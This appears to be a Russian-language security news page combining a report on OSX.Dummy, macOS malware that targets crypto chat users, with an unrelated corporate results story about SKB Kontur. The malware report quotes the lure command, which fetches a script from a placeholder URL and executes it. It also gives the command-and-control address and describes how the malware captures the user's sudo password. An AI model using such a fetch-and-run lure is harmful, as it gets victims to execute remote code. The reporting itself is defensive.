Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

Выручка СКБ Контур в 2025 году выросла на 19,6% — до 48,3 млрд рублей

СКБ Контур подвёл итоги 2025 года: выручка выросла на 19,6% и достигла 48,3 млрд рублей по сравнению с 2024-м. Число клиентов, по данным компании, превысило 3,1 млн — это примерно 35% российского бизнеса. Основной вклад в рост, как объясняют в Контуре, дали направления электронного документооборота и обязательной отчётности.

Через Контур.Диадок за год прошло 1,5 млрд документов — это +24,5% год к году. На динамику повлияли и сервисы маркировки, и более активный переход малого бизнеса на ЭДО.

Из заметных событий — Диадок стал первым негосударственным оператором ГосЭДО, в сервисе стартовал публичный пилот Госключа, а также заработал юридически значимый трансграничный ЭДО с Беларусью и Казахстаном.

Отдельно компания выделяет «логистическую» часть ЭДО — просто потому, что скоро она станет обязательной: с 1 сентября 2026 года значительную часть перевозочных документов (включая транспортные накладные) нужно будет переводить в электронный вид. Контур в 2025 году участвовал в подготовке подзаконных актов через ассоциацию «Цифровой транспорт и логистика» и параллельно подключал клиентов к системе.

По Контур.Экстерну тоже рост: объём оборота документов с контролирующими органами увеличился на 15% и превысил 200 млн документов. А у комплексного решения для малого бизнеса (учёт + отчётность + ЭДО) количество подключений, по данным компании, выросло в 1,5 раза.

В кибербезопасности Контур в 2025 году запустил отдельный бренд Контур.Эгида, куда свели решения для защиты «внутреннего контура» компаний — от двухфакторной аутентификации до инструментов привилегированного доступа. Помимо этого, на рынок вышла система для защищённого корпоративного доступа Коннект.

Ещё одна заметная линия — ИИ-функции в продуктах. В ноябре 2025 года в Экстерне появился ИИ-ассистент бухгалтера для работы с налоговым законодательством. В Контур.Фокусе с помощью ИИ сделали краткие пересказы исходов арбитражных дел (чтобы не перечитывать длинные судебные документы), а в Контур.Толке добавили автоматическое определение дипфейков и генерацию протоколов встреч.

Совокупные социальные инвестиции компании, по её данным, выросли на 15%. Контур продолжил образовательные программы — в профориентационных проектах участвовали более 100 тысяч школьников в 38 регионах, а для первокурсников ФИИТ УрФУ в 2025–2026 учебном году появилась новая стипендия.

RSS: Новости на портале Anti-Malware.ru